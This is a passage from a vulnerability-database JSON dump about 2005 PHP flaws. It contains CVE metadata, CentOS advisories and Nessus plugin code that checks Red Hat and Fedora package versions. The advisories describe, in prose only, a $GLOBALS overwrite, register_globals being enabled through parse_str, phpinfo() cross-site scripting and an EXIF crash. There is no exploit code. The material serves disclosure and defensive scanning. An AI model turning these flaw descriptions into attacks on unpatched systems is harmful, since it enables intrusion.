"cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:24:39", "description": "The parse_str function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when called with only one parameter, allows remote attackers to enable the register_globals directive via inputs that cause a request to be terminated due to the memory_limit setting, which causes PHP to set an internal flag that enables register_globals and allows attackers to exploit vulnerabilities in PHP applications that would otherwise be protected.", "edition": 4, "cvss3": {}, "published": "2005-11-01T12:47:00", "title": "CVE-2005-3389", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3389"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:4.0.6"], "id": "CVE-2005-3389", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3389", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:28:36", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390", "CVE-2004-1019"], "description": "**CentOS Errata and Security Advisory** CESA-2005:838-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024430.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2005-11-10T23:45:48", "published": "2005-11-10T23:45:48", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/024430.html", "id": "CESA-2005:838-01", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T20:33:43", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "description": "**CentOS Errata and Security Advisory** CESA-2005:1110-001\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024436.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024437.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-dba\nphp-devel\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-831.html", "edition": 30, "modified": "2005-11-11T03:55:21", "published": "2005-11-11T03:54:29", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/024436.html", "id": "CESA-2005:1110-001", "title": "php security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:25:25", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "description": "**CentOS Errata and Security Advisory** CESA-2005:831\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Please note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nA denial of service flaw was found in the way PHP processes EXIF image\r\ndata. It is possible for an attacker to cause PHP to crash by supplying\r\ncarefully crafted EXIF image data. (CVE-2005-3353)\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024431.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024432.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024433.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024438.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024439.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024440.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024448.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024452.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-November/024453.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-831.html", "edition": 4, "modified": "2005-11-12T14:59:07", "published": "2005-11-11T01:54:54", "href": "http://lists.centos.org/pipermail/centos-announce/2005-November/024431.html", "id": "CESA-2005:831", "title": "php security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T13:05:33", "description": "Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Note that this\nvulnerability only affects installations which have register_globals\nenabled in the PHP configuration file, which is not a default or\nrecommended option. The Common Vulnerabilities and Exposures project\nassigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has\nbeen corrected.\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.", "edition": 27, "published": "2005-11-15T00:00:00", "title": "RHEL 2.1 : php (RHSA-2005:838)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390", "CVE-2004-1019"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-manual"], "id": "REDHAT-RHSA-2005-838.NASL", "href": "https://www.tenable.com/plugins/nessus/20207", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:838. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20207);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"RHSA\", value:\"2005:838\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2005:838)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Note that this\nvulnerability only affects installations which have register_globals\nenabled in the PHP configuration file, which is not a default or\nrecommended option. The Common Vulnerabilities and Exposures project\nassigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has\nbeen corrected.\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:838\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:838\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:05:47", "description": "This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "Fedora Core 4 : php-5.0.4-10.5 (2005-1062)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-xml", "p-cpe:/a:fedoraproject:fedora:php-pgsql", "p-cpe:/a:fedoraproject:fedora:php-gd", "p-cpe:/a:fedoraproject:fedora:php-xmlrpc", "p-cpe:/a:fedoraproject:fedora:php-soap", "p-cpe:/a:fedoraproject:fedora:php-mysql", "p-cpe:/a:fedoraproject:fedora:php-imap", "p-cpe:/a:fedoraproject:fedora:php-pear", "p-cpe:/a:fedoraproject:fedora:php-ldap", "p-cpe:/a:fedoraproject:fedora:php", "p-cpe:/a:fedoraproject:fedora:php-debuginfo", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:php-odbc", "p-cpe:/a:fedoraproject:fedora:php-snmp", "p-cpe:/a:fedoraproject:fedora:php-devel", "p-cpe:/a:fedoraproject:fedora:php-dba", "p-cpe:/a:fedoraproject:fedora:php-mbstring", "p-cpe:/a:fedoraproject:fedora:php-bcmath", "p-cpe:/a:fedoraproject:fedora:php-ncurses"], "id": "FEDORA_2005-1062.NASL", "href": "https://www.tenable.com/plugins/nessus/20187", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2005-1062.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20187);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"FEDORA\", value:\"2005-1062\");\n\n script_name(english:\"Fedora Core 4 : php-5.0.4-10.5 (2005-1062)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes several security fixes :\n\n - fixes for prevent malicious requests from overwriting\n the GLOBALS array (CVE-2005-3390)\n\n - a fix to stop the parse_str() function from enabling the\n register_globals setting (CVE-2005-3389)\n\n - fixes for Cross-Site Scripting flaws in the phpinfo()\n output (CVE-2005-3388)\n\n - a fix for a denial of service (process crash) in EXIF\n image parsing (CVE-2005-3353)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2005-November/001555.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d743e09\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 